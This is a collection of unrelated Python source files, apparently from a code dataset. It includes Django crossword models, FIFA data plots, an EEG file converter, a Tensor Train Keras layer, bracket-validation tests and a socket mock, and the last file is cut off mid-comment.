                                default=settings.LANGUAGE_CODE, choices=settings.LANGUAGES,
                                help_text=_('Language of (most of) the words in this dictionary'))
    description = models.CharField(_('Description'), max_length=255, blank=True)
    owner = models.ForeignKey(User, verbose_name=_('Owner'))

    def __str__(self):
        return "%s (%s)" % (self.name, self.language)

    def get_absolute_url(self):
        return '/dictionary/%d/' % self.id
class Word(models.Model):
    """
    A word with a description, belonging to exactly one dictionary.
    The word text is normalized (uppercased, ASCII-only) on save.
    """
    class Meta:
        verbose_name = _('Word')
        verbose_name_plural = _('Words')
        ordering = ['word', 'priority']
        # The same word may appear in several dictionaries, but only once
        # per dictionary.
        unique_together = (('word', 'dictionary'),)

    word = models.CharField(_('Word'), max_length=63, help_text=_('a word fitting a crossword puzzle; will become uppercased; no numbers, hyphens etc.'))
    dictionary = models.ForeignKey(Dictionary, verbose_name=_('Dictionary'))  # , related_name="%(class)s_related")
    description = models.CharField(_('Description'), max_length=127, help_text=_('Meaning of the word within the context of the selected dictionary'))
    priority = models.SmallIntegerField(_('Priority'), default=0, help_text=_('0 is neutral, you can increase or decrease the priority'))

    def __str__(self):
        return "%s\t%s" % (self.word, self.description)

    def save(self, *args, **kwargs):
        # Normalize before persisting so lookups by cleaned word succeed.
        self.word = cleanword(self.word)
        super(Word, self).save(*args, **kwargs)

    def get_absolute_url(self):
        return '/dictionary/%d/%s/' % (self.dictionary.id, self.word)
class WordlistUpload(models.Model):
    """
    Transient model driving wordlist imports: on save() the uploaded .txt
    file is parsed into Word rows (optionally creating a new Dictionary),
    after which the upload record deletes itself and the temp file.
    """
    wordlist_file = models.FileField(_('wordlist file (.txt)'), upload_to=os.path.relpath(os.path.join(settings.MEDIA_ROOT, 'temp')),
                                     help_text=_('Select a .txt file containing a single word per line to upload as a new dictionary.'))
    dictionary = models.ForeignKey(Dictionary, null=True, blank=True, help_text=_('Select a dictionary to add these words to. leave this empty to create a new dictionary from the supplied name.'))
    name = models.CharField(_('Name'), max_length=31, blank=True, help_text=_('A short descriptive name'))
    uniqueonly = models.BooleanField(_('only unique'), default=True, help_text=_('Import only words that are not contained in any other dictionary?'))
    public = models.BooleanField(_('public?'), default=True, help_text=_('May everyone use this dictionary?'))
    language = models.CharField(_('Language'), max_length=15,
                                default=settings.LANGUAGE_CODE, choices=settings.LANGUAGES,
                                help_text=_('Language of (most of) the words in this dictionary'))
    description = models.CharField(_('Description'), blank=True, max_length=255)
    owner = models.ForeignKey(User, verbose_name=_('Owner'))

    class Meta:
        verbose_name = _('wordlist upload')
        verbose_name_plural = _('wordlist uploads')

    def __str__(self):
        return "%s (%s)" % (self.name, self.wordlist_file)

    def save(self, *args, **kwargs):
        """Persist briefly so the file exists on disk, import it, then
        delete this upload record. Returns the target Dictionary."""
        super(WordlistUpload, self).save(*args, **kwargs)
        dictionary = self.process_wordlist()
        super(WordlistUpload, self).delete()
        return dictionary

    def process_wordlist(self):
        """Parse the uploaded file into Word rows.

        Returns the Dictionary the words were added to, or None when the
        file is missing or no target dictionary/name was supplied.
        """
        if not os.path.isfile(self.wordlist_file.path):
            # TODO: throw exception?
            return None
        # 'r' already performs universal-newline translation on Python 3;
        # the original 'rU' mode is deprecated and removed in Python 3.11.
        # The context manager also fixes the handle being left open on error.
        with open(self.wordlist_file.path, 'r', encoding='utf-8') as wordfile:
            lines = wordfile.readlines()
        if self.dictionary:
            D = self.dictionary
        else:
            if not self.name:
                # BUG FIX: was `return false` -- a NameError at runtime.
                # Without a name we cannot create a dictionary; signal
                # failure the same way as the missing-file case above.
                return None
            D = Dictionary.objects.create(
                name=self.name,
                public=self.public,
                language=self.language,
                description=self.description,
                owner=self.owner,
            )
            D.save()
        for line in lines:
            (newword, newdesc, newprio) = splitwordline(line)
            newdesc = newdesc[:127]  # max. length of Word.description
            # Words shorter than two letters are useless for crosswords.
            if len(newword) < 2:
                continue
            try:
                if self.uniqueonly:
                    # Reuse any same-language word from *any* dictionary;
                    # IndexError below means "not found".
                    W = Word.objects.filter(word=newword, dictionary__language=D.language)
                    W = W[0]
                else:
                    W = Word.objects.get(word=newword, dictionary=D)
            except (Word.DoesNotExist, IndexError):
                W = Word.objects.create(word=newword, dictionary=D)
            if newdesc:
                W.description = newdesc
            if newprio:
                W.priority = newprio
            W.save()
        # Best effort: remove the temp upload file; log but don't fail.
        try:
            os.remove(self.wordlist_file.path)
        except Exception as ex:
            logger.exception(ex)
        return D
# Supported crossword layouts (value stored in Puzzle.type).
PUZZLE_TYPES = (
    ('d', _('default crossword puzzle with black squares')),  # numbers and black squares in grid. only possible type ATM
    ('b', _('crossword puzzle with bars (no squares)')),
    ('s', _('Swedish crossword puzzle (questions in squares)')),  # default in most magazines
    # other...
)
class Puzzle(models.Model):
    """
    A saved crossword puzzle: grid dimensions, solution characters,
    word-start numbers and questions, plus ownership/audit metadata.
    The serialized formats of `numbers` and `questions` are documented
    on the fields below.
    """
    title = models.CharField(verbose_name=_('title'), max_length=255, blank=True, help_text=_('title or short description of this puzzle'))
    code = models.SlugField(verbose_name=_('code'), max_length=63, editable=False, unique=True, help_text=_('auto-generated URL code of this puzzle'))
    public = models.BooleanField(verbose_name=_('public'), default=True, help_text=_('Is this puzzle publicly viewable?'))
    language = models.CharField(verbose_name=_('language'), max_length=7, default=settings.LANGUAGE_CODE, help_text=_('main language of this puzzle'), choices=settings.LANGUAGES)
    owner = models.ForeignKey(User, verbose_name=_('owner'), help_text=_('owner of the puzzle'))
    createdby = models.ForeignKey(User, verbose_name=_('created by'), related_name='+', editable=False, help_text=_('user that saved the puzzle for the first time (may be anonymous)'))
    lastchangedby = models.ForeignKey(User, verbose_name=_('last changed by'), related_name='+', editable=False, help_text=_('user that saved the puzzle the latest time'))
    createdon = models.DateTimeField(verbose_name=_('created on'), auto_now_add=True, help_text=_('timestamp of creation (first save)'))
    lastchangedon = models.DateTimeField(verbose_name=_('last changed on'), auto_now=True, help_text=_('timestamp of last change'))
    type = models.CharField(verbose_name=_('type'), max_length=1, default='d', editable=False, help_text=_('type of this puzzle'), choices=PUZZLE_TYPES)
    width = models.PositiveSmallIntegerField(verbose_name=_('width'), default=settings.CROISEE_GRIDDEF_X, help_text=_('width of the puzzle (number of characters)'))
    height = models.PositiveSmallIntegerField(verbose_name=_('height'), default=settings.CROISEE_GRIDDEF_Y, help_text=_('height of the puzzle (number of characters)'))
    text = models.TextField(verbose_name=_('text'), blank=True, help_text=_('characters of the puzzle (solution)'))
    numbers = models.TextField(verbose_name=_('numbers'), blank=True, help_text=_('list of coordinates of word start numbers'))  # x,y,num\n
    questions = models.TextField(verbose_name=_('questions'), blank=True, help_text=_('list of questions'))  # 1::h::Description\n

    class Meta:
        verbose_name = _('crossword puzzle')
        verbose_name_plural = _('crossword puzzles')

    def __str__(self):
        return "%s (%s)" % (self.code, self.title)

    def get_absolute_url(self):
        return '/puzzle/%s/' % self.code
1974277 | <reponame>UrosOgrizovic/FIFA-19-player-position-predictor<gh_stars>1-10
import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import globals as GLOBALS
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
def plot_number_of_players_by_position(players):
    """Bar-plot the player count per Position (ordered by frequency),
    save it to plot/players_by_position.png and show it.

    :param players: DataFrame with a "Position" column.
    """
    sns.set(style="darkgrid")
    plot = sns.countplot(x="Position", data=players, order=players["Position"].value_counts().index)
    figure = plot.get_figure()
    figure.set_size_inches(12.8, 7.2)
    figure.savefig("plot/players_by_position.png")
    plt.show()
def plot_number_of_players_by_section(players):
    """Aggregate positions into the four pitch sections (ATT/MID/DEF/GK),
    bar-plot the counts, save to plot/players_by_section.png and show.

    Section membership comes from the position lists in the GLOBALS module.
    """
    num_of_players_by_section = {"ATT": 0, "MID": 0, "DEF": 0, "GK": 0}
    for i in range(len(players["Position"])):
        if players["Position"].iloc[i] in GLOBALS.attacking_positions:
            num_of_players_by_section["ATT"] += 1
        elif players["Position"].iloc[i] in GLOBALS.midfield_positions:
            num_of_players_by_section["MID"] += 1
        elif players["Position"].iloc[i] in GLOBALS.defensive_positions:
            num_of_players_by_section["DEF"] += 1
        elif players["Position"].iloc[i] == "GK":
            num_of_players_by_section["GK"] += 1
    # Turn the tally into a DataFrame sorted by count, largest first.
    df = pd.DataFrame(num_of_players_by_section.items(), columns=["Section", "Number of players"])
    df = df.sort_values(["Number of players"], ascending=False).reset_index(drop=True)
    sns.set(style="darkgrid")
    plot = sns.barplot(x="Section", y="Number of players", data=df)
    figure = plot.get_figure()
    figure.set_size_inches(12.8, 7.2)
    figure.savefig("plot/players_by_section.png")
    plt.show()
def plot_correlation_matrix(players):
    """
    1. plots the lower-triangle correlation matrix of the numeric columns,
       to see which values can be removed
    2. saves the correlation matrix to "plot/correlation_matrix.png"
    :param players: DataFrame of player attributes
    :return: None (shows and saves the figure)
    """
    # Compute the correlation matrix
    corr = players.corr()
    # Generate a mask for the upper triangle (it mirrors the lower one)
    mask = np.zeros_like(corr)
    mask[np.triu_indices_from(mask)] = True
    # Set up the matplotlib figure
    figure, ax = plt.subplots(figsize=(12.8, 7.2))
    # Generate a custom diverging colormap
    cmap = sns.diverging_palette(220, 10, as_cmap=True)
    # Draw the heatmap with the mask and correct aspect ratio
    sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
                square=True, linewidths=.5, cbar_kws={"shrink": .5})
    figure.savefig("plot/" + "correlation_matrix.png")
    plt.show()
def plot_some_attributes(players, attribute_name):
    """Plot the distribution of one player attribute, save it to
    plot/<attribute_name>.png (lowercased) and show it.

    :param players: DataFrame containing *attribute_name* as a column.
    :param attribute_name: column name to plot.
    """
    plt.style.use('ggplot')
    plot = sns.distplot(players[attribute_name])
    figure = plot.get_figure()
    figure.set_size_inches(12.8, 7.2)
    figure.savefig("plot/" + attribute_name.lower() + ".png")
    plt.show()
3517338 | # https://www.hackerrank.com/challenges/simple-array-sum
import sys
if __name__ == '__main__':
    # Input format (HackerRank "Simple Array Sum"):
    #   line 1: element count (consumed but not otherwise needed),
    #   line 2: the space-separated integers to sum.
    stream = sys.stdin
    _count = int(stream.readline())
    values = [int(token) for token in stream.readline().split()]
    print(sum(values))
| StarcoderdataPython |
4840457 | # -*- coding: utf-8 -*-
"""
Application Constants, Defualt Values
:author: <NAME>
:version: 0.1
:date: 14 Sep. 2017
"""
__docformat__ = "restructuredtext"
SCENARIO_NAME = "PlanHeat"
SCENARIO_VERSION = 15
CONFIG_FILE_PATH="/config/"
CONFIG_FILE_NAME="PlanHeat.cfg"
TEMP_DIR_PATH="temp"
LOG_DIR_PATH ="log"
LOG_LEVELS={"CRITICAL":50,
"ERROR":40,
"WARNING":30,
"INFO":20,
"DEBUG":10,
"NOTSET":0}
DB_PARAMS = {"databaseName" : "PlanHeat.db",
"path" : "/db/"
}
LOG_PARAMS = {"logName" : "PlanHeat",
"logExt" : "log",
"loggingLevel": LOG_LEVELS["INFO"],
"path" : "/log/"}
JAR_FILE_PARAMS= {"jarFileName" : "llamada.jar", "path" : "/java/"}
JAVA_MAIN_CLASS="tecnalia.geoprocess.PerformProcess"
INTERMEDIATE_FILE_CSV="xmlResultado.csv"
USE_NOA_DATA="Y"
NOA_URL = "http://snf-652558.vm.okeanos.grnet.gr/planheat/proxy.php?action=getCHEntities"
EPSG_URL = "http://prj2epsg.org/search.json"
#NOA HTTP API Rest Response Codes
HTTP_RESPONSE_OK=200
NOA_TIMEOUT=30 #30 Seconds
HOURS_PER_YEAR=8760
RAW_FILES_TTL = 86400 # 1 days seconds
DAYS_REMOVE_OLD_LOGS=3
DECIMAL_POINT_IS_COMMA="Y"
LIDAR_FILE_EXT="asc"
# SHAPE Constants
SHAPE_TYPE_FILE={"0":'NULL',"1":'POINT',"3":'POLYLINE',"5":'POLYGON',"8":'MULTIPOINT',"11":'POINTZ',"13":'POLYLINEZ',"15":'POLYGONZ',"18":'MULTIPOINTZ',"21":'POINTM', \
"23":'POLYLINEM',"25":'POLYGONM',"28":'MULTIPOINTM',"31":'MULTIPATCH'}
PROCESS_THREAD_PRIORITY=7 # use the same priority as the creating thread. This is the default.
PROCESS_WAIT_TO_KILL=5 # Seconds Waiting for terminate the Thread
USE_PERSIST_SCENARIO = "Y"
LAUNCH_JAVA_PROCESS = "Y"
OPTIONS_FILE = "N"
| StarcoderdataPython |
1892880 | import numpy as np
import os
import pandas as pd
'''
Takes in a pair file of .ades and .dat and extracts the channel names and the corresponding SEEG time series
places them into four different files
- raw numpy
- headers csv
- annotations csv
- channels csv
Which follows format that we place data from .edf files. Most data is empty since .ades does not get alot of these
data points.
'''
def rawtonumpy(raweeg, outputdatafile):
    """Save the raw EEG array to *outputdatafile* in NumPy .npy format.

    :param raweeg: array-like of EEG samples (channels x samples).
    :param outputdatafile: destination path for the .npy file.
    """
    # Context manager guarantees the handle is closed; the original opened
    # the file and never closed it.
    with open(outputdatafile, 'wb') as npfile:
        np.save(npfile, raweeg)
def chantocsv(chanlabels, samplerate, numsamps, outputchanfile):
    """Write per-channel metadata to *outputchanfile* as CSV (no header/index
    row beyond the embedded column-name row), matching the layout used for
    .edf conversions. Fields .ades cannot provide are left empty.

    :param chanlabels: iterable of raw channel labels.
    :param samplerate: sampling frequency applied to every channel.
    :param numsamps: sample count applied to every channel.
    :param outputchanfile: destination CSV path.
    """
    ##################### 2. Import channel headers ########################
    # create list with dataframe column channel header names
    channelheaders = [[
        'Channel Number',
        'Labels',
        'Physical Maximum',
        'Physical Minimum',
        'Digital Maximum',
        'Digital Minimum',
        'Sample Frequency',
        'Num Samples',
        'Physical Dimensions',
    ]]
    # get the channel labels of file and convert to list of strings
    # -> also gets rid of excessive characters ('POL' prefix, spaces)
    chanlabels = [str(x).replace('POL', '').replace(' ', '')
                  for x in chanlabels]
    # read chan header data from each chan for each column and append to list
    for i in range(len(chanlabels)):
        channelheaders.append([
            i + 1,
            chanlabels[i],
            '',
            '',
            '',
            '',
            samplerate,
            numsamps,
            '',
        ])
    # create CSV file of channel header names and data
    channelheaders_df = pd.DataFrame(data=channelheaders)
    channelheaders_df.to_csv(outputchanfile, index=False, header=False)
def annotationtocsv(outputannotationsfile):
    """Write an annotations CSV containing only the column-header row.

    .ades files carry no annotation data, so the file is intentionally
    empty apart from the header (this keeps the output layout identical to
    the .edf conversion pipeline).

    :param outputannotationsfile: destination CSV path.
    """
    ##################### 3. Import File Annotations ########################
    annotationheaders = [[
        'Time (sec)',
        'Duration',
        'Description'
    ]]
    # NOTE: the original appended empty rows in a `for n in np.arange(0)`
    # loop, which never executes; the dead loop has been removed.
    annotationheaders_df = pd.DataFrame(data=annotationheaders)
    annotationheaders_df.to_csv(
        outputannotationsfile,
        index=False,
        header=False)
def headerstocsv(samplerate, numsamps, outputheadersfile):
    """Write the file-level header CSV (one column-name row plus one data
    row), matching the layout used for .edf conversions. Fields .ades does
    not provide (dates, patient/equipment info) are left empty.

    :param samplerate: sampling frequency of the recording.
    :param numsamps: total number of samples in the recording.
    :param outputheadersfile: destination CSV path.
    """
    # create list with dataframe column file header names
    fileheaders = [[
        'pyedfib Version',
        'Birth Date',
        'Gender',
        'Start Date (D-M-Y)',
        'Start Time (H-M-S)',
        'Patient Code',
        'Equipment',
        'Data Record Duration (s)',
        'Number of Data Records in File',
        'Number of Annotations in File',
        'Sample Frequency',
        'Samples in File',
        'Physical Dimension'
    ]]
    # append file header data for each dataframe column to list; only the
    # duration, sample rate and sample count are derivable from .ades data.
    fileheaders.append([
        '',
        '',
        '',
        '',
        '',
        '',
        '',
        numsamps / float(samplerate),
        '',
        '',
        samplerate,
        numsamps,
        '',
    ])
    # create dataframes from array of meta data
    fileheaders_df = pd.DataFrame(data=fileheaders)
    fileheaders_df.to_csv(outputheadersfile, index=False, header=False)
def read_ades(fname):
    """Parse an .ades header file and its companion .dat binary.

    Returns (srate, sensors, dat, nsamp): sampling rate (float), sensor
    label list, a float32 array of shape (n_sensors, samples_on_disk),
    and the declared sample count (float, as parsed).

    NOTE(review): header lines are assumed to look like "key = value";
    when the 3-way unpack fails, `lhs` becomes a *list* (handled below)
    but `rhs` keeps its previous value -- confirm this matches real
    .ades layouts before relying on srate/nsamp from malformed lines.
    """
    dat_fname = fname.split('.ades')[0] + '.dat'
    srate = None
    nsamp = None
    sensors = []
    with open(fname, 'r') as fd:
        for line in fd.readlines():
            if line.startswith('#'):  # comment line
                continue
            try:
                lhs, _, rhs = line.strip().split(' ')
            except ValueError:
                # Line without " = value" part: treat the tokens as a label.
                lhs = line.strip().split(' ')
            if lhs == 'samplingRate':
                srate = float(rhs)
            elif lhs == 'numberOfSamples':
                nsamp = float(rhs)
            elif lhs in ('date', 'time'):
                pass
            else:
                # Anything else is a sensor label.
                if isinstance(lhs, list):
                    lhs = lhs[0]
                sensors.append(lhs)
    assert srate and nsamp
    # On-disk layout is sample-major; reshape then transpose to
    # (sensors, samples).
    dat = np.fromfile(
        dat_fname, dtype=np.float32).reshape(
            (-1, len(sensors))).T
    return srate, sensors, dat, nsamp
if __name__ == '__main__':
    # NOTE(review): both `filename` and the first `patient` assignment are
    # immediately overwritten below -- they look like leftovers from manual
    # runs; confirm before removing.
    filename = './id004_cv_sz1.ades'

    # set all directories
    root_dir = os.path.join('/Users/adam2392/Downloads/')
    outputdir = '/Users/adam2392/Downloads/converted'
    # root_dir = os.path.join('/Volumes/<NAME>/pydata/tvbforwardsim/')
    patient = 'id004_cv'
    patient = 'id015_sf'
    # patient = 'id001_ac'
    datadir = os.path.join(root_dir, patient)

    # Get ALL .ades datafiles recursively under the patient directory.
    datafiles = []
    for root, dirs, files in os.walk(datadir):
        for file in files:
            if '.DS' not in file and '.ades' in file:
                datafiles.append(os.path.join(root, file))
    print(len(datafiles))

    # Per-seizure output directory name, e.g. "id015_sf_sz0".
    def patdir(idx): return patient.lower() + '_sz' + str(idx)

    for idx, filename in enumerate(datafiles):
        print(idx, filename)
        srate, sensors, dat, nsamp = read_ades(filename)
        if not os.path.exists(os.path.join(outputdir, patdir(idx))):
            os.makedirs(os.path.join(outputdir, patdir(idx)))
        # 1. set the four output filenames (raw data + three CSVs).
        npyfile = os.path.join(
            outputdir,
            patdir(idx),
            patdir(idx) +
            '_rawnpy.npy')
        chanfile = os.path.join(
            outputdir,
            patdir(idx),
            patdir(idx) +
            '_chans.csv')
        headerfile = os.path.join(
            outputdir,
            patdir(idx),
            patdir(idx) +
            '_headers.csv')
        annotationsfile = os.path.join(
            outputdir,
            patdir(idx),
            patdir(idx) +
            '_annotations.csv')
        # 2. write the four files mirroring the .edf conversion layout.
        rawtonumpy(dat, npyfile)
        chantocsv(sensors, srate, nsamp, chanfile)
        headerstocsv(srate, nsamp, headerfile)
        annotationtocsv(annotationsfile)
321067 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-12-20 17:10
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated: drops Region.description and adds the nullable
    # Company.description_en text field.

    dependencies = [
        ('ping', '0006_auto_20180113_0247'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='region',
            name='description',
        ),
        migrations.AddField(
            model_name='company',
            name='description_en',
            field=models.TextField(blank=True, null=True),
        ),
    ]
| StarcoderdataPython |
4818468 | import copy
# Competitive-programming solution. NOTE(review): problem statement unknown;
# from the structure it appears to compute, for the values at even and odd
# positions separately, the size of the most frequent value ("best run" after
# sorting), and print how many positions must change -- with a correction when
# both halves share the same most frequent value (then the second-best count
# of one half is used). Confirm against the original problem before editing.
n = int(input())
v = input().split()
# Split input into even-indexed (x) and odd-indexed (y) elements.
x = []
y = []
for i in range(n):
    if i % 2 == 0:
        x.append(v[i])
    else:
        y.append(v[i])
x.sort()
y.sort()
# q/r: distinct values per half; s/t: their run lengths (frequencies).
q = []
r = []
s = []
t = []
countx = 1
county = 1
# Run-length encode the sorted even-position values.
for j in range(int(n / 2)):
    if x[j - 1] == x[j] and j != 0:
        countx += 1
        if j == n / 2 - 1:  # flush the final run
            s.append(countx)
            q.append(x[j])
            countx = 1
    elif x[j - 1] != x[j] and j != 0:
        s.append(countx)
        q.append(x[j - 1])
        countx = 1
# Run-length encode the sorted odd-position values.
for k in range(int(n / 2)):
    if y[k - 1] == y[k] and k != 0:
        county += 1
        if k == n / 2 - 1:  # flush the final run
            t.append(county)
            r.append(y[k])
            county = 1
    elif y[k - 1] != y[k] and k != 0:
        t.append(county)
        r.append(y[k - 1])
        county = 1
# Sorted copies to find the second-largest frequency in each half.
s2 = copy.deepcopy(s)
t2 = copy.deepcopy(t)
#a = [int(m) for m in a]
s2.sort(reverse=True)
t2.sort(reverse=True)
sc = -1
tc = -1
sk = 0  # second-largest frequency among even positions (0 if none)
tk = 0  # second-largest frequency among odd positions (0 if none)
ssym = 0
for i in s2:
    if sc == -1:
        sk = i
    elif sc == 0:
        sk = i
        ssym = 1
        break
    sc += 1
if sc == 0 and ssym == 0:
    sk = 0
tsym = 0
for i in t2:
    if tc == -1:
        tk = i
    elif tc == 0:
        tk = i
        tsym = 1
        break
    tc += 1
if tc == 0 and tsym == 0:
    tk = 0
# If the two halves' most frequent values differ, keep both maxima;
# otherwise trade the smaller maximum for that half's second-best run.
if q[s.index(max(s))] != r[t.index(max(t))]:
    print(n - max(s) - max(t))
else:
    if sk >= tk:
        print(n - sk - max(t))
    else:
        print(n - max(s) - tk)
| StarcoderdataPython |
305709 | '''
Implementation of the paper 'Tensorizing Neural Networks', <NAME>, <NAME>, <NAME>, <NAME>, NIPS, 2015
to compress a dense layer using Tensor Train factorization.
TTLayer compute y = Wx + b in the compressed form.
'''
from keras import backend as K, activations, initializers
from keras.engine.topology import Layer
import numpy as np
import tensorflow as tf
from palmnet.utils import get_facto_for_channel_and_order, DCT_CHANNEL_PREDEFINED_FACTORIZATIONS
class TTLayerDense(Layer):
    """ Given x\in\mathbb{R}^{N}, b\in\mathbb{R}^{M}, W\in\mathbb{R}^{M\times N}, y\in\mathbb{R}^{M}, compute y = Wx + b in the TT-format.

    Parameters:
        inp_modes: [n_1, n_2, ..., n_k] such that n_1*n_2*...*n_k=N
        out_modes: [m_1, m_2, ..., m_k] such that m_1*m_2*...m_k = M
        mat_ranks: [1, r_1, r_2, ..., r_k]

    In "auto" mode the factorizations of N and M are derived at build time
    from the actual input/output sizes; in "manual" mode they must be given
    and are validated in __init__.
    """

    def __init__(self, nb_units, mat_ranks, inp_modes=None, out_modes=None, mode="auto", bias_initializer='zeros', kernel_initializer='glorot_normal', use_bias=True, activation=None, **kwargs):
        self.activation = activations.get(activation)
        self.use_bias = use_bias
        self.kernel_initializer = initializers.get(kernel_initializer)
        self.bias_initializer = initializers.get(bias_initializer)
        self.mode = mode
        self.mat_ranks = np.array(mat_ranks).astype(int)
        # Number of TT cores = number of ranks minus one.
        self.order = len(self.mat_ranks) - 1
        self.nb_units = nb_units
        if self.mode == "auto":
            # Modes (possibly None) are resolved later, in build().
            self.inp_modes = inp_modes
            self.out_modes = out_modes
        elif self.mode == "manual":
            if inp_modes is None or out_modes is None:
                raise ValueError("inp_modes and out_modes should be specified in mode manual.")
            self.inp_modes = np.array(inp_modes).astype(int)
            self.out_modes = np.array(out_modes).astype(int)
            self.num_dim = self.inp_modes.shape[0]
            if np.prod(self.out_modes) != self.nb_units:
                raise ValueError("out_modes product should equal to nb units: {} != {}".format(np.prod(self.out_modes), self.nb_units))
            if self.inp_modes.shape[0] != self.out_modes.shape[0]:
                raise ValueError("The number of input and output dimensions should be the same.")
            if self.order != self.out_modes.shape[0]:
                raise ValueError("Rank should have one more element than input/output shape")
            for r in self.mat_ranks:
                if isinstance(r, np.integer) != True:
                    raise ValueError("The rank should be an array of integer.")
        else:
            raise ValueError("Unknown mode {}".format(self.mode))
        super(TTLayerDense, self).__init__(**kwargs)
        # Tracks the largest flattened activation seen (diagnostic only).
        self.image_max_size = -1

    def build(self, input_shape):
        # In auto mode, factor the actual channel counts into `order` modes.
        inp_ch = input_shape[-1]
        if self.mode == "auto":
            self.inp_modes = get_facto_for_channel_and_order(inp_ch, self.order, dct_predefined_facto=DCT_CHANNEL_PREDEFINED_FACTORIZATIONS) if self.inp_modes is None else self.inp_modes
            self.out_modes = get_facto_for_channel_and_order(self.nb_units, self.order, dct_predefined_facto=DCT_CHANNEL_PREDEFINED_FACTORIZATIONS) if self.out_modes is None else self.out_modes
        assert np.prod(self.out_modes) == self.nb_units, "The product of out_modes should equal to the number of output units."
        assert np.prod(self.inp_modes) == inp_ch, "The product of inp_modes should equal to the input dimension."
        dim = self.order
        # One trainable 2-D core per TT dimension, shaped
        # [m_i * r_{i+1}, r_i * n_i].
        self.mat_cores = []
        for i in range(dim):
            self.mat_cores.append(
                self.add_weight(name='mat_core_%d' % (i + 1), shape=[self.out_modes[i] * self.mat_ranks[i + 1], self.mat_ranks[i] * self.inp_modes[i]], initializer=self.kernel_initializer, trainable=True))
        if self.use_bias:
            self.bias = self.add_weight(name="bias", shape=(np.prod(self.out_modes),), initializer=self.bias_initializer, trainable=True)
        super(TTLayerDense, self).build(input_shape)

    def call(self, input_):
        # Sequentially contract the input with each TT core; the
        # reshape/transpose pattern follows the TT matrix-by-vector scheme
        # of Novikov et al., "Tensorizing Neural Networks" (NIPS 2015).
        dim = self.order
        out = tf.reshape(input_, [-1, np.prod(self.inp_modes)])
        self.image_max_size = max(self.image_max_size, np.prod(self.inp_modes))
        out = tf.transpose(out, [1, 0])
        for i in range(dim):
            out = tf.reshape(out, [self.mat_ranks[i] * self.inp_modes[i], -1])
            out = tf.matmul(self.mat_cores[i], out)
            out = tf.reshape(out, [self.out_modes[i], -1])
            out = tf.transpose(out, [1, 0])
        out = tf.reshape(out, [-1, np.prod(self.out_modes)])
        # self.image_max_size = max(self.image_max_size, np.prod([val.value for val in out.get_shape()[1:]]))
        if self.use_bias:
            out = tf.add(out, self.bias, name='out')
        if self.activation is not None:
            out = self.activation(out)
        return out

    def compute_output_shape(self, input_shape):
        return (input_shape[0], np.prod(self.out_modes))

    def get_config(self):
        # Serialize everything needed to reconstruct the layer.
        super_config = super().get_config()
        super_config.update({
            "nb_units": self.nb_units,
            "inp_modes": self.inp_modes,
            "out_modes": self.out_modes,
            "mat_ranks": self.mat_ranks,
            "mode": self.mode,
            'bias_initializer': initializers.serialize(self.bias_initializer),
            'kernel_initializer': initializers.serialize(self.kernel_initializer),
            'use_bias': self.use_bias,
            'activation': activations.serialize(self.activation),
        })
        return super_config
| StarcoderdataPython |
class SubscriptionItem(object):
    """A named subscription entry with an optional state value."""

    def __init__(self, name=None, state=None):
        # name:  identifier/display string (may be None)
        # state: arbitrary subscription state (may be None)
        self.name = name
        self.state = state

    def __str__(self):
        # BUG FIX: __str__ must return a str. The original returned
        # self.name directly, which raised TypeError whenever name was
        # left as None (the default).
        return str(self.name)
78967 | import pytest
from multi_bracket_validation import multi_bracket_validation
def test_mbv_true_case_simple():
    """Fully nested balanced brackets validate as True."""
    assert multi_bracket_validation('[{()}]') == True
def test_mbv_true_case_empty_str():
    """An empty string is vacuously balanced."""
    assert multi_bracket_validation('') == True
def test_mbv_true_complex():
    """Balanced brackets interleaved with non-bracket characters validate."""
    assert multi_bracket_validation('{{[[asdf]]}a}()') == True
def test_mbv_false_simple():
    """A single unclosed bracket is unbalanced."""
    assert multi_bracket_validation('(') == False
def test_mbv_false_complex():
    """ tests function returns false on complex unbalanced str"""
    # `is False` instead of `== False` (flake8 E712); still requires a real False.
    assert multi_bracket_validation('{asd{[asdf[]aasdf]}}())') is False
# str1 = '{[}]'
# str2 = '{{[[asdf]]}a}()'
# str3 = '{asd{[asdf[]aasdf]}}())'
# str4 = 'a'
# print(multi_bracket_validation(str1))
# print(multi_bracket_validation(str2))
# print(multi_bracket_validation(str3))
# print(multi_bracket_validation(str4)) | StarcoderdataPython |
54466 | #!/usr/bin/env python3
import getpass
import json
import pprint
import requests
import sys
# The credentials to be used
try:
    user = input('Login name: ')
    # If it's a tty, use the version that doesn't echo the password.
    if sys.stdin.isatty():
        password = getpass.getpass('Password: ')
    else:
        sys.stdout.write('Password: ')
        sys.stdout.flush()
        password = sys.stdin.readline().rstrip()
except (EOFError, KeyboardInterrupt):
    # Narrowed from a bare `except:`: only an aborted or closed prompt means
    # "quit"; programming errors are no longer silently swallowed.
    print('Quitting')
    sys.exit(1)

login = {
    'username': user,
    'password': password,
}

# Send credentials to login url to retrieve token. Raise
# an error, if the return code indicates a problem.
# Please use the URL of the system you'd like to access the API
# in the example below.
resp = requests.post('https://app.dimensions.ai/api/auth.json', json=login)
resp.raise_for_status()

# Create http header using the generated token.
headers = {
    'Authorization': "JWT " + resp.json()['token']
}

# Execute DSL query.
resp = requests.post(
    'https://app.dimensions.ai/api/dsl.json',
    data='search publications in title_abstract_only for "SBML" return publications[basics+extras]',
    headers=headers)
# Fail fast if the query itself was rejected, instead of writing an error
# payload to the output file (this check was previously missing).
resp.raise_for_status()

# Write to file.
with open('example-publications.json', 'w') as f:
    json.dump(resp.json(), f)
4870274 | <reponame>aerostone/vdebug
import unittest
import vdebug.connection
class SocketMockError():
    """Placeholder error type accompanying SocketMock."""
class SocketMock():
    """In-memory socket stand-in.

    Responses are queued as lists of single-byte chunks (add_response); recv
    consumes them. Sent payloads are recorded and retrievable via
    get_last_sent.
    """

    def __init__(self):
        self.response = []   # queued incoming data: list of lists of 1-byte values
        self.last_msg = []   # everything passed to send() since the last get_last_sent()

    def recv(self, length):
        """Return up to `length` bytes from the current response chunk.

        If the chunk is shorter than `length` it is discarded and b'' is
        returned (an empty read, which callers treat as EOF).
        """
        ret = self.response[0]
        if len(ret) >= length:
            chars = ret[0:length]
            newval = ret[length:]
            if len(newval) > 0:
                self.response[0] = newval
            else:
                self.response.pop(0)
            # The original had two identical branches here (length == 1 vs
